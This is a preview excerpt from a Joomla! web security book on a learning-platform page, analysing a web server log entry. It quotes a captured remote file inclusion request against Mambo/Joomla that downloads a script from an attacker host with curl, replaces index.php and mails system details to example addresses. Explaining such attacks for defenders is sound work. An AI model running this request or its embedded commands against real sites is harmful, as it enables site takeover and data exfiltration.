O'Reilly logo

Joomla! Web Security: Secure your Joomla! Website from Common Security Threats with this easy-to-use Guide by Tom Canavan

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

Log File Analysis

According to www.honeynet.org/papers/webapp/:

GET/index.php?option=com_content&do_pdf=1&id=1index2.php?_
REQUEST[option]=com_content&_REQUEST[Itemid]=1\&GLOBALS=&mosConfig_
absolute_path=http://192.168.57.112/~photo/cm?&cmd=cd%20cache;
curl%20-O%20\http://192.168.57.112/~photo/cm;mv%20cm%20index.
php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20\uname_i2_
192.168.181.27%20evil1@example.com;uname%20-a%20|%20mail%20-s%20uname_
i2_192.168.181.27%20\ evil2@example.com;echo|

This has the effect of executing the script of the attackers’ choosing, herehttp://192.168.57.112/~photo/cm. The exact operation of the exploit against the vulnerability can be seen in “Mambo Exploit” in Appendix A. In this case, the included file is a “helper” ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required